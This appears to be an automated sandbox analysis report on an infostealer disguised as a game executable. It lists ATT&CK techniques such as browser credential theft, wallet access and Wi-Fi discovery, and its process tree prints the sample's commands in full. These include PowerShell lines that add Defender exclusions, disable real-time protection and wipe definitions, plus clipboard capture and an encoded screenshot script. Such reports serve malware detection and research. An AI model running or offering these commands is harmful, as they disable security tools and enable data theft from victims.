bd01c97b0ff81284694b8fa5745afc08fa11fa240c1ceb3c7a44323d04e1c8dd

Resubmissions

17-01-2025 22:41

250117-2mbsesvnhv 10

17-01-2025 22:08

250117-12qdpavjfx 10

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-01-2025 22:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Cypkoland 2077.exe
Size

6.1MB
MD5

07032b0b26256766fc5f92272cfb73dc
SHA1

c800d8dbb06749cb908b4adb6e8bb268469ef1ff
SHA256

bd01c97b0ff81284694b8fa5745afc08fa11fa240c1ceb3c7a44323d04e1c8dd
SHA512

ce8163cc97a1f13d8782d095dfa9cfe0ab80bfd7f6f98bec6ada516f16b77c74840d5d15a17f664d56b63f1c6b7b999df97fecff1b4ea1c5f02ddd76c61bace0
SSDEEP

98304:mLhjEtdFBgwQamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RSPMtF93hMAl:mV6FLeN/FJMIDJf0gsAGK4RSktyAl

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1124	powershell.exe
2152	powershell.exe
2084	powershell.exe
2028	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Cypkoland 2077.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4804	cmd.exe
548	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4884	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe
4152	Cypkoland 2077.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1336	tasklist.exe
4136	tasklist.exe
4460	tasklist.exe
4696	tasklist.exe
2020	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023bfd-21.dat	upx
behavioral2/memory/4152-25-0x00007FFCFC6A0000-0x00007FFCFCB0E000-memory.dmp	upx
behavioral2/files/0x0009000000023bbc-27.dat	upx
behavioral2/memory/4152-30-0x00007FFD00A30000-0x00007FFD00A54000-memory.dmp	upx
behavioral2/files/0x0008000000023bfb-29.dat	upx
behavioral2/memory/4152-48-0x00007FFD045A0000-0x00007FFD045AF000-memory.dmp	upx
behavioral2/files/0x0008000000023bc9-47.dat	upx
behavioral2/files/0x0008000000023bc8-46.dat	upx
behavioral2/files/0x0008000000023bc7-45.dat	upx
behavioral2/files/0x0008000000023bc4-44.dat	upx
behavioral2/files/0x000e000000023bc2-43.dat	upx
behavioral2/files/0x0009000000023bbe-42.dat	upx
behavioral2/files/0x0009000000023bbd-41.dat	upx
behavioral2/files/0x0008000000023bb7-40.dat	upx
behavioral2/files/0x0008000000023c17-39.dat	upx
behavioral2/files/0x0008000000023c05-38.dat	upx
behavioral2/files/0x0008000000023c04-37.dat	upx
behavioral2/files/0x0008000000023bfc-34.dat	upx
behavioral2/files/0x0008000000023bfa-33.dat	upx
behavioral2/memory/4152-54-0x00007FFD00560000-0x00007FFD0058D000-memory.dmp	upx
behavioral2/memory/4152-56-0x00007FFD00B60000-0x00007FFD00B79000-memory.dmp	upx
behavioral2/memory/4152-58-0x00007FFD00750000-0x00007FFD0076F000-memory.dmp	upx
behavioral2/memory/4152-60-0x00007FFCFCC30000-0x00007FFCFCDA1000-memory.dmp	upx
behavioral2/memory/4152-62-0x00007FFD00510000-0x00007FFD00529000-memory.dmp	upx
behavioral2/memory/4152-64-0x00007FFD007D0000-0x00007FFD007DD000-memory.dmp	upx
behavioral2/memory/4152-66-0x00007FFD00490000-0x00007FFD004BE000-memory.dmp	upx
behavioral2/memory/4152-68-0x00007FFCFC6A0000-0x00007FFCFCB0E000-memory.dmp	upx
behavioral2/memory/4152-74-0x00007FFCED9F0000-0x00007FFCEDD65000-memory.dmp	upx
behavioral2/memory/4152-73-0x00007FFD00A30000-0x00007FFD00A54000-memory.dmp	upx
behavioral2/memory/4152-71-0x00007FFCFD1B0000-0x00007FFCFD268000-memory.dmp	upx
behavioral2/memory/4152-81-0x00007FFD00B60000-0x00007FFD00B79000-memory.dmp	upx
behavioral2/memory/4152-82-0x00007FFCED8D0000-0x00007FFCED9E8000-memory.dmp	upx
behavioral2/memory/4152-79-0x00007FFD005A0000-0x00007FFD005AD000-memory.dmp	upx
behavioral2/memory/4152-78-0x00007FFD00560000-0x00007FFD0058D000-memory.dmp	upx
behavioral2/memory/4152-76-0x00007FFCFD440000-0x00007FFCFD454000-memory.dmp	upx
behavioral2/memory/4152-107-0x00007FFD00750000-0x00007FFD0076F000-memory.dmp	upx
behavioral2/memory/4152-108-0x00007FFCFCC30000-0x00007FFCFCDA1000-memory.dmp	upx
behavioral2/memory/4152-194-0x00007FFD00510000-0x00007FFD00529000-memory.dmp	upx
behavioral2/memory/4152-269-0x00007FFD00490000-0x00007FFD004BE000-memory.dmp	upx
behavioral2/memory/4152-270-0x00007FFCFD1B0000-0x00007FFCFD268000-memory.dmp	upx
behavioral2/memory/4152-289-0x00007FFCED9F0000-0x00007FFCEDD65000-memory.dmp	upx
behavioral2/memory/4152-316-0x00007FFCFCC30000-0x00007FFCFCDA1000-memory.dmp	upx
behavioral2/memory/4152-315-0x00007FFD00750000-0x00007FFD0076F000-memory.dmp	upx
behavioral2/memory/4152-311-0x00007FFD00A30000-0x00007FFD00A54000-memory.dmp	upx
behavioral2/memory/4152-310-0x00007FFCFC6A0000-0x00007FFCFCB0E000-memory.dmp	upx
behavioral2/memory/4152-325-0x00007FFCFC6A0000-0x00007FFCFCB0E000-memory.dmp	upx
behavioral2/memory/4152-353-0x00007FFCED8D0000-0x00007FFCED9E8000-memory.dmp	upx
behavioral2/memory/4152-352-0x00007FFD005A0000-0x00007FFD005AD000-memory.dmp	upx
behavioral2/memory/4152-351-0x00007FFCFD440000-0x00007FFCFD454000-memory.dmp	upx
behavioral2/memory/4152-350-0x00007FFCFD1B0000-0x00007FFCFD268000-memory.dmp	upx
behavioral2/memory/4152-349-0x00007FFCED9F0000-0x00007FFCEDD65000-memory.dmp	upx
behavioral2/memory/4152-348-0x00007FFD00490000-0x00007FFD004BE000-memory.dmp	upx
behavioral2/memory/4152-347-0x00007FFD007D0000-0x00007FFD007DD000-memory.dmp	upx
behavioral2/memory/4152-346-0x00007FFD00510000-0x00007FFD00529000-memory.dmp	upx
behavioral2/memory/4152-345-0x00007FFCFCC30000-0x00007FFCFCDA1000-memory.dmp	upx
behavioral2/memory/4152-344-0x00007FFD00750000-0x00007FFD0076F000-memory.dmp	upx
behavioral2/memory/4152-343-0x00007FFD00B60000-0x00007FFD00B79000-memory.dmp	upx
behavioral2/memory/4152-342-0x00007FFD00560000-0x00007FFD0058D000-memory.dmp	upx
behavioral2/memory/4152-341-0x00007FFD045A0000-0x00007FFD045AF000-memory.dmp	upx
behavioral2/memory/4152-340-0x00007FFD00A30000-0x00007FFD00A54000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4324	cmd.exe
2284	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4300	WMIC.exe
2788	WMIC.exe
3252	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3744	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
2084	powershell.exe
1124	powershell.exe
1124	powershell.exe
2084	powershell.exe
548	powershell.exe
548	powershell.exe
3612	powershell.exe
3612	powershell.exe
548	powershell.exe
3612	powershell.exe
2028	powershell.exe
2028	powershell.exe
1208	powershell.exe
1208	powershell.exe
2152	powershell.exe
2152	powershell.exe
4064	powershell.exe
4064	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	4460	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2972	WMIC.exe
Token: SeSecurityPrivilege	2972	WMIC.exe
Token: SeTakeOwnershipPrivilege	2972	WMIC.exe
Token: SeLoadDriverPrivilege	2972	WMIC.exe
Token: SeSystemProfilePrivilege	2972	WMIC.exe
Token: SeSystemtimePrivilege	2972	WMIC.exe
Token: SeProfSingleProcessPrivilege	2972	WMIC.exe
Token: SeIncBasePriorityPrivilege	2972	WMIC.exe
Token: SeCreatePagefilePrivilege	2972	WMIC.exe
Token: SeBackupPrivilege	2972	WMIC.exe
Token: SeRestorePrivilege	2972	WMIC.exe
Token: SeShutdownPrivilege	2972	WMIC.exe
Token: SeDebugPrivilege	2972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2972	WMIC.exe
Token: SeRemoteShutdownPrivilege	2972	WMIC.exe
Token: SeUndockPrivilege	2972	WMIC.exe
Token: SeManageVolumePrivilege	2972	WMIC.exe
Token: 33	2972	WMIC.exe
Token: 34	2972	WMIC.exe
Token: 35	2972	WMIC.exe
Token: 36	2972	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2972	WMIC.exe
Token: SeSecurityPrivilege	2972	WMIC.exe
Token: SeTakeOwnershipPrivilege	2972	WMIC.exe
Token: SeLoadDriverPrivilege	2972	WMIC.exe
Token: SeSystemProfilePrivilege	2972	WMIC.exe
Token: SeSystemtimePrivilege	2972	WMIC.exe
Token: SeProfSingleProcessPrivilege	2972	WMIC.exe
Token: SeIncBasePriorityPrivilege	2972	WMIC.exe
Token: SeCreatePagefilePrivilege	2972	WMIC.exe
Token: SeBackupPrivilege	2972	WMIC.exe
Token: SeRestorePrivilege	2972	WMIC.exe
Token: SeShutdownPrivilege	2972	WMIC.exe
Token: SeDebugPrivilege	2972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2972	WMIC.exe
Token: SeRemoteShutdownPrivilege	2972	WMIC.exe
Token: SeUndockPrivilege	2972	WMIC.exe
Token: SeManageVolumePrivilege	2972	WMIC.exe
Token: 33	2972	WMIC.exe
Token: 34	2972	WMIC.exe
Token: 35	2972	WMIC.exe
Token: 36	2972	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4300	WMIC.exe
Token: SeSecurityPrivilege	4300	WMIC.exe
Token: SeTakeOwnershipPrivilege	4300	WMIC.exe
Token: SeLoadDriverPrivilege	4300	WMIC.exe
Token: SeSystemProfilePrivilege	4300	WMIC.exe
Token: SeSystemtimePrivilege	4300	WMIC.exe
Token: SeProfSingleProcessPrivilege	4300	WMIC.exe
Token: SeIncBasePriorityPrivilege	4300	WMIC.exe
Token: SeCreatePagefilePrivilege	4300	WMIC.exe
Token: SeBackupPrivilege	4300	WMIC.exe
Token: SeRestorePrivilege	4300	WMIC.exe
Token: SeShutdownPrivilege	4300	WMIC.exe
Token: SeDebugPrivilege	4300	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4300	WMIC.exe
Token: SeRemoteShutdownPrivilege	4300	WMIC.exe
Token: SeUndockPrivilege	4300	WMIC.exe
Token: SeManageVolumePrivilege	4300	WMIC.exe
Token: 33	4300	WMIC.exe
Token: 34	4300	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2032 wrote to memory of 4152	2032	Cypkoland 2077.exe	82
PID 2032 wrote to memory of 4152	2032	Cypkoland 2077.exe	82
PID 4152 wrote to memory of 3744	4152	Cypkoland 2077.exe	83
PID 4152 wrote to memory of 3744	4152	Cypkoland 2077.exe	83
PID 4152 wrote to memory of 4316	4152	Cypkoland 2077.exe	84
PID 4152 wrote to memory of 4316	4152	Cypkoland 2077.exe	84
PID 4152 wrote to memory of 4280	4152	Cypkoland 2077.exe	86
PID 4152 wrote to memory of 4280	4152	Cypkoland 2077.exe	86
PID 4152 wrote to memory of 4068	4152	Cypkoland 2077.exe	89
PID 4152 wrote to memory of 4068	4152	Cypkoland 2077.exe	89
PID 3744 wrote to memory of 1124	3744	cmd.exe	91
PID 3744 wrote to memory of 1124	3744	cmd.exe	91
PID 4316 wrote to memory of 2084	4316	cmd.exe	92
PID 4316 wrote to memory of 2084	4316	cmd.exe	92
PID 4280 wrote to memory of 4460	4280	cmd.exe	93
PID 4280 wrote to memory of 4460	4280	cmd.exe	93
PID 4068 wrote to memory of 2972	4068	cmd.exe	94
PID 4068 wrote to memory of 2972	4068	cmd.exe	94
PID 4152 wrote to memory of 1944	4152	Cypkoland 2077.exe	96
PID 4152 wrote to memory of 1944	4152	Cypkoland 2077.exe	96
PID 1944 wrote to memory of 3572	1944	cmd.exe	98
PID 1944 wrote to memory of 3572	1944	cmd.exe	98
PID 4152 wrote to memory of 3904	4152	Cypkoland 2077.exe	99
PID 4152 wrote to memory of 3904	4152	Cypkoland 2077.exe	99
PID 3904 wrote to memory of 4748	3904	cmd.exe	101
PID 3904 wrote to memory of 4748	3904	cmd.exe	101
PID 4152 wrote to memory of 4816	4152	Cypkoland 2077.exe	102
PID 4152 wrote to memory of 4816	4152	Cypkoland 2077.exe	102
PID 4816 wrote to memory of 4300	4816	cmd.exe	104
PID 4816 wrote to memory of 4300	4816	cmd.exe	104
PID 4152 wrote to memory of 2144	4152	Cypkoland 2077.exe	105
PID 4152 wrote to memory of 2144	4152	Cypkoland 2077.exe	105
PID 2144 wrote to memory of 2788	2144	cmd.exe	107
PID 2144 wrote to memory of 2788	2144	cmd.exe	107
PID 4152 wrote to memory of 3796	4152	Cypkoland 2077.exe	108
PID 4152 wrote to memory of 3796	4152	Cypkoland 2077.exe	108
PID 4152 wrote to memory of 5096	4152	Cypkoland 2077.exe	110
PID 4152 wrote to memory of 5096	4152	Cypkoland 2077.exe	110
PID 4152 wrote to memory of 4580	4152	Cypkoland 2077.exe	112
PID 4152 wrote to memory of 4580	4152	Cypkoland 2077.exe	112
PID 4152 wrote to memory of 4804	4152	Cypkoland 2077.exe	114
PID 4152 wrote to memory of 4804	4152	Cypkoland 2077.exe	114
PID 3796 wrote to memory of 4696	3796	cmd.exe	116
PID 3796 wrote to memory of 4696	3796	cmd.exe	116
PID 5096 wrote to memory of 2020	5096	cmd.exe	117
PID 5096 wrote to memory of 2020	5096	cmd.exe	117
PID 4580 wrote to memory of 3632	4580	cmd.exe	118
PID 4580 wrote to memory of 3632	4580	cmd.exe	118
PID 4152 wrote to memory of 5008	4152	Cypkoland 2077.exe	119
PID 4152 wrote to memory of 5008	4152	Cypkoland 2077.exe	119
PID 4152 wrote to memory of 4204	4152	Cypkoland 2077.exe	120
PID 4152 wrote to memory of 4204	4152	Cypkoland 2077.exe	120
PID 4804 wrote to memory of 548	4804	cmd.exe	122
PID 4804 wrote to memory of 548	4804	cmd.exe	122
PID 4152 wrote to memory of 220	4152	Cypkoland 2077.exe	125
PID 4152 wrote to memory of 220	4152	Cypkoland 2077.exe	125
PID 4152 wrote to memory of 4324	4152	Cypkoland 2077.exe	123
PID 4152 wrote to memory of 4324	4152	Cypkoland 2077.exe	123
PID 4152 wrote to memory of 3688	4152	Cypkoland 2077.exe	128
PID 4152 wrote to memory of 3688	4152	Cypkoland 2077.exe	128
PID 4152 wrote to memory of 1608	4152	Cypkoland 2077.exe	129
PID 4152 wrote to memory of 1608	4152	Cypkoland 2077.exe	129
PID 4324 wrote to memory of 2284	4324	cmd.exe	132
PID 4324 wrote to memory of 2284	4324	cmd.exe	132

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4748	attrib.exe
540	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Cypkoland 2077.exe
"C:\Users\Admin\AppData\Local\Temp\Cypkoland 2077.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Users\Admin\AppData\Local\Temp\Cypkoland 2077.exe
  "C:\Users\Admin\AppData\Local\Temp\Cypkoland 2077.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cypkoland 2077.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cypkoland 2077.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4280
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1944
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3904
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3796
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5096
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4580
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5008
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4204
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4324
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:220
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3688
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAA